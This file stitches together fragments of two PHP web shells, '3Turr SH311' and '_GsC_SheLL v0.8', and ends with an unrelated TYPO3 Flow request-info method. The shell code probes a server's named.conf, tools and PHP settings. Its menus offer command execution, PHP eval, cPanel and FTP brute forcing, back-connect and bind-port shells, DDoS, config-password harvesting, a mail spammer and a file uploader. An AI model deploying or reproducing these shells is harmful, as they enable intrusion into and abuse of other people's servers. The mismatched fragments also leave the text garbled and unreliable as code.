@$_SERVER["REMOTE_ADDR"] . '</td> </tr> <tr> <td><span>WEBS:</span></td> <td width="76%">'; if ($GLOBALS['sys'] == 'unix') { $d0mains = @file("/etc/named.conf"); if (!$d0mains) { echo "CANT READ named.conf"; } else { $count; foreach ($d0mains as $d0main) { if (@ereg("zone", $d0main)) { preg_match_all('#zone "(.*)"#', $d0main, $domains); flush(); if (strlen(trim($domains[1][0])) > 2) { flush(); $count++; } } } echo "<b>{$count}</b> Domains"; } } else { echo "CANT READ |Windows|"; } echo '</td> </tr> <tr> <td height="16"><span>HDD:</span></td> <td>' . yemenSize($totalSpace) . ' <span>Free:</span>' . yemenSize($freeSpace) . ' [' . (int) ($freeSpace / $totalSpace * 100) . '%]</td> </tr>'; if ($GLOBALS['sys'] == 'unix') { if (!@ini_get('safe_mode')) { echo '<tr><td height="18" colspan="2"><span>Useful : </span>'; $userful = array('gcc', 'lcc', 'cc', 'ld', 'make', 'php', 'perl', 'python', 'ruby', 'tar', 'gzip', 'bzip', 'bzip2', 'nc', 'locate', 'suidperl'); foreach ($userful as $item) { if (yemenWhich($item)) { echo $item . ','; } } echo '</td> </tr> <tr> <td height="0" colspan="2"><span>Downloader: </span>'; $downloaders = array('wget', 'fetch', 'lynx', 'links', 'curl', 'get', 'lwp-mirror'); foreach ($downloaders as $item2) { if (yemenWhich($item2)) { echo $item2 . ','; } } echo '</td> </tr>'; } else { echo '<tr><td height="18" colspan="2"><span>useful: </span>'; echo '--------------</td> </tr><td height="0" colspan="2"><span>Downloader: </span>-------------</td> </tr>'; } } else { echo '<tr><td height="18" colspan="2"><span>Window: </span>'; echo yemenEx('ver'); } echo '<tr> <td height="16" colspan="2">' . $disfun . '</td> </tr> <tr> <td height="16" colspan="2"><span>cURL:' . $curl . ' MySQL:' . $mysql . ' MSSQL:' . $mssql . ' PostgreSQL:' . $pg . ' Oracle: </span>' . $or . '</td><td width="15%"></td> </tr> <tr> <td height="11" style="width:70%" colspan="3"><span>Open_basedir:' . $open_b . ' Safe_mode_exec_dir:' . $safe_exe . ' Safe_mode_include_dir:' . $safe_include . '</td> </tr> <tr> <td height="11"><span>Server </span></td> <td colspan="2">' . @getenv('SERVER_SOFTWARE') . '</td> </tr>'; if ($GLOBALS[sys] == "win") { echo '<tr> <td height="12"><span>DRIVE:</span></td> <td colspan="2">' . $drives . '</td> </tr>'; } echo '<tr> <td height="12"><span>PWD:</span></td> <td colspan="2" >' . $cwd_links . ' <a href=# onclick="g(\'FilesMan\',\'' . base64_encode($GLOBALS['home_cwd']) . '\')"><font color=red >[HOME]</font></a></td> </tr> </table> </div> <div id="menu-box"> <style type="text/css"> div#menu{height:40px;:url(http://apycom.com/ssc-data/items/1/00bfff/images/main-bg.png) repeat-x;} div#menu ul{margin:0;padding:0;list-style:none;float:left;} div#menu ul.menu {padding-left:10px;} div#menu li{position:relative;z-index:9;margin:0;padding:0 5px 0 0;display:block;float:left;} div#menu li:hover>ul {left:-2px;} div#menu a {position:relative;z-index:10;height:40px;display:block;float:left;line-height:40px;text-decoration:none;font:normal 13px Trebuchet MS;} div#menu a:hover {color:#000;} div#menu li.current a {} div#menu span {display:block;cursor:pointer;background-repeat:no-repeat;background-position:95% 0;} div#menu ul ul a.parent span {background-position:95% 8px;background-image:url(http://apycom.com/ssc-data/items/1/00bfff/images/item-pointer.gif);} div#menu ul ul a.parent:hover span {background-image:url(http://apycom.com/ssc-data/items/1/00bfff/images/item-pointer-mover.gif);} div#menu a {padding:0 6px 0 10px;line-height:30px;color:#fff;} div#menu span {margin-top:5px;} div#menu li {background:url(http://apycom.com/ssc-data/items/1/00bfff/images/main-delimiter.png) 98% 4px no-repeat;} div#menu li.last {background:none;} div#menu ul ul li {background:none;} div#menu ul ul {position:absolute;top:38px;left:-999em;width:180%;padding:1px 0 0 0;background:rgb(45,45,45);margin-top:1px;} div#menu ul ul a {padding:0 0 0 15px;height:auto;float:none;display:block;line-height:24px;color:rgb(169,169,169);} div#menu ul ul span {margin-top:0;padding-right:15px;_padding-right:20px;color:rgb(169,169,169);} div#menu ul ul a:hover span {color:#fff;}div#menu ul ul li.last {background:none;} div#menu ul ul li {width:100%;}div#menu ul ul ul {padding:1;margin:-38px 0 0 163px !important;margin-left:172px;}div#menu ul ul ul {background:rgb(41,41,41);} div#menu ul ul ul ul {background:rgb(38,38,38);}div#menu ul ul ul ul {background:rgb(35,35,35);} div#menu li.back {background:url(http://apycom.com/ssc-data/items/1/00bfff/images/lava.png) no-repeat right -44px !important;background-image:url(http://apycom.com/ssc-data/items/1/00bfff/images/lava.gif);width:13px;height:44px;z-index:8;position:absolute;margin:-1px 0 0 -5px;} div#menu li.back .left {background:url(http://apycom.com/ssc-data/items/1/00bfff/images/lava.png) no-repeat top left !important;background-image:url(http://apycom.com/ssc-data/items/1/00bfff/images/lava.gif);height:44px;margin-right:8px;} </style> <div id="menu"><ul class="menu"> <li><a href="#" onclick="g(\'FilesMan\',null,\'\',\'\',\'\')">HOME</a></li> <li><a href="#" onclick="g(\'proc\',null,\'\',\'\',\'\')">SYSTEM</a></li> <li><a href="#">PHP</a> <ul> <li><a href="#" onclick="g(\'phpeval\',null,\'\',\'\',\'\')">EVAL</a></li> <li><a href="#" onclick="g(\'hash\',null,\'\',\'\',\'\')">HASH</a></li> </ul> <li><a href="#" onclick="g(\'sql\',null,\'\',\'\',\'\')">SQL</a></li> <li><a href="#" >BRUTE&CRACK</a> <ul> <li><a href="#" onclick="g(\'bf\',null,\'\',\'\',\'\')">CPanel</a></li> <li><a href="#" onclick="g(\'bruteftp\',null,\'\',\'\',\'\')">FTP</a></li> </ul> </li> <li><a href="#">NETWORK</a> <ul> <li><a href="#" onclick="g(\'connect\',null,\'\',\'\',\'\')">BACK CONNECT</a></li> <li><a href="#" onclick="g(\'net\',null,\'\',\'\',\'\')">BIND PORT</a></li> </ul> <li><a href="#" onclick="g(\'dos\',null,\'\',\'\',\'\')">DDOS</a></li> <li><a href="#" onclick="g(\'safe\',null,\'\',\'\',\'\')">SAFE MODE</a></li> <li><a href="#" onclick="g(\'symlink\',null,\'\',\'\',\'\')">SYMLINK</a></li> <!-- <li><a href="#" onclick="g(\'wp\',null,\'\',\'\',\'\')">Mass Wpress</a></li> <li><a href="#" onclick="g(\'joom\',null,\'\',\'\',\'\')">Mass Joomla</a></li> --> <li><a href="#">Perl Sh3ll</a> <ul> <li><a href="#" onclick="g(\'perl\',null,\'\',\'\',\'\')">CGI 1.0v</a></li> <li><a href="#" onclick="g(\'perl4\',null,\'\',\'\',\'\')">CGI 1.4v</a></li> </ul> </li> <li><a href="#" >Mirrors</a> <ul> <li><a href="#" onclick="g(\'zone\',null,\'\',\'\',\'\')">Zone-h.org</a></li> <li><a href="#" onclick="g(\'zonejoy\',null,\'\',\'\',\'\')">Aljyyosh.org</a></li> </ul> </li> <li><a href="#">TOOLS</a> <ul> <li><a href="#" onclick="g(\'rev\',null,\'\',\'\',\'\')">Reverse IP</a></li> <li><a href="#" onclick="g(\'zip\',null,\'\',\'\',\'\')">ZIP</a></li> <li><a href="#" onclick="g(\'mail\',null,\'\',\'\',\'\')">Mail Spammer</a></li> </ul> </li> <li><a href="#" >3Turr-VIP</a> <ul> <li><a href="#" onclick="g(\'conpass\',null,\'\',\'\',\'\')">C0nf1G-P4$$\'s</a></li> </ul> </li> <li><a href="#" onclick="g(\'yemen\',null,\'\',\'\',\'\')">ABOUT</a></li> </ul> </div> '; ?> <footer id="det" style="z-index:9999;background:#000;position:fixed; left:0px; right:0px; bottom:0px; background:rgb(0,0,0);padding:3px; text-align:center; border-top: 1px solid #ff0000; border-bottom: 2px solid #990000;color:red;"> <font align=center>3Turr ~ SH311</font> </footer> <form style="z-index:9999;position:fixed;left:1;bottom:4px;display:inline" onsubmit="Encoder('encod');g('proc',null,this.c.value);return false;"> <input style="width:290px" type=text id=encod name=c value="" placeholder="Execute" <?php !isset($_POST['a']) || $_POST['a'] != 'proc' || !isset($_POST['p1']) || $_POST['p1'] == '' ? print "autofocus" : 0; ?> > <input type=submit style="color:red;width:30px;" value=">>"> </form> <!--###################--> <form style="z-index:9999;position:fixed;right:10px;bottom:3px;display:inline;" method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='<?php echo htmlspecialchars($GLOBALS['cwd']); ?> '> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value='<?php echo isset($_POST['charset']) ? $_POST['charset'] : ''; ?> '> <input style="border:1px solid #5BEEFF;height:19px;value:[ select ];" class="toolsInp" type=file name=f > <input style="color:red;width:30px;" type=submit value=">>" ></form> <?php }
echo "<title>_GsC_SheLL_v0.8_By _GsC_</title>"; //Style CSS echo "<style>\ninput {\n background: #b00;\n color: #fff;\n }\n\n input:hover {\n background: #000;\n }\n\n select {\n background: #b00;\n color: #fff;\n }\n \n select:hover {\n background: #000;\n }\n\n hr { color: red;\n background-color: red;\n height: 3px; \n width:100%;\n border:0; }\n\n .footer table { border:1px dashed black\n }\n\n .footer tr { border:1px groove black\n }\n\n .footer td { border:1px groove black\n }\n\n textarea {\n background: #b00;\n color: #fff;\n }\n\n textarea:hover {\n background: #000;\n }\n\n body {\n font-family: courier,courier-new,arial;\n background-color:black;\n color:white;\n }\n\n A:link { text-decoration: none;\n color:white\n }\n\n A:hover { \n color:red\n }\n\n a:visited { text-decoration: none;\n color: #FFFFFF;\n }\n\n A:visited:hover { \n color:red\n }\n\n table {border:1px dashed red}\n\n td {border:1px groove #666666}\n\n #dropper:hover {\n color: #fff;\n }\n </style> "; //Banner echo "<center><b><a href=\"?\"><font color=\"green\" size=\"8\">_GsC_</font><font color=\"white\" size=\"8\">SheLL_</font><font color=\"red\" size=\"8\">V0.8_</font></a></b></center><br> <br>"; echo "<hr>"; //Applicazioni echo "<center><b>[<a href=?mode=fakemail>Fake mailer</a>] [<a href=?mode=PHPinfo>PHP info</a>]</center><hr>"; //Info echo "<center><table border=\"0\"><tr><td><b><font color=red>Ip server:</font></b> " . $_SERVER['SERVER_ADDR'] . "</td><td><b><font color=red>Server Software:</font></b> " . $_SERVER['SERVER_SOFTWARE'] . "</td><td><b><font color=red>Versione PHP:</font></b> " . phpversion() . " </tr><tr>\n<td><b><font color=red>Your ip:</font></b> " . $_SERVER['REMOTE_ADDR'] . "</td><td><b><font color=red>Safe mode:</font></b>"; if (@ini_get("safe_mode") == "1" || @ini_get("safe_mode") == "on") { echo "On"; } else { echo "Off"; } echo "</td><td><b><font color=red>id:</font></b> " . get_current_user() . " | uid= " . getmyuid() . " | gid= " . getmygid() . "</td></tr></table></center><br><hr>"; //Variabili Generali $dir = htmlspecialchars($_GET['dir']); // Home shell if (!isset($mode)) { $_GET['dir'] == '' ? $dir = @getcwd() : ($dir = htmlspecialchars($_GET['dir'])); @chdir($dir); if (isset($dir)) { echo "<form method=get> Dir : <input type=text name=dir value={$dir} size=65%> <input type=submit value=Invia></form>"; } echo "<table width=\"100%\" border=1><tr><td><b>File name</b></td><td><b>Tipo</b></td><td><b>Size (KB)</b></td><td><b>Chmod</b></td><td><b>Azioni</b></td></tr>"; foreach (glob("*") as $file) { $chmod = substr(sprintf('%o', fileperms($file)), -3); if (is_dir($file)) { if (isset($dir)) { echo "\n \n \n <tr>\n <td>\n <a href=?dir=" . @getcwd() . "/" . $file . ">\n <font color=\"red\">{$file}</font>\n </a>\n </td>\n <td>\n Folder\n <td>\n " . filesize($file) . "\n </td>\n <td>\n {$chmod}\n </td>\n <td>\n [<a href=?mode=rename&file={$dir}/{$file}>R</a>] [<a href=?mode=delete&file={$dir}/{$file}>D</a>] [<a href=?mode=copy&file={$dir}/{$file}>C</a>] [<a href=?mode=chmod&file={$dir}/{$file}&chmod={$chmod}>P</a>] [<a href=?mode=download&file={$dir}/{$file}>D</a>]\n </td>\n </tr>\n ";
/** * Render information about the current request, if possible * * @return string */ protected function renderRequestInfo() { $output = ''; if (Bootstrap::$staticObjectManager instanceof ObjectManagerInterface) { $bootstrap = Bootstrap::$staticObjectManager->get(\TYPO3\Flow\Core\Bootstrap::class); /* @var Bootstrap $bootstrap */ $requestHandler = $bootstrap->getActiveRequestHandler(); if ($requestHandler instanceof HttpRequestHandlerInterface) { $request = $requestHandler->getHttpRequest(); $response = $requestHandler->getHttpResponse(); $output .= PHP_EOL . 'HTTP REQUEST:' . PHP_EOL . ($request == '' ? '[request was empty]' : $request) . PHP_EOL; $output .= PHP_EOL . 'HTTP RESPONSE:' . PHP_EOL . ($response == '' ? '[response was empty]' : $response) . PHP_EOL; $output .= PHP_EOL . 'PHP PROCESS:' . PHP_EOL . 'Inode: ' . getmyinode() . PHP_EOL . 'PID: ' . getmypid() . PHP_EOL . 'UID: ' . getmyuid() . PHP_EOL . 'GID: ' . getmygid() . PHP_EOL . 'User: ' . get_current_user() . PHP_EOL; } } return $output; }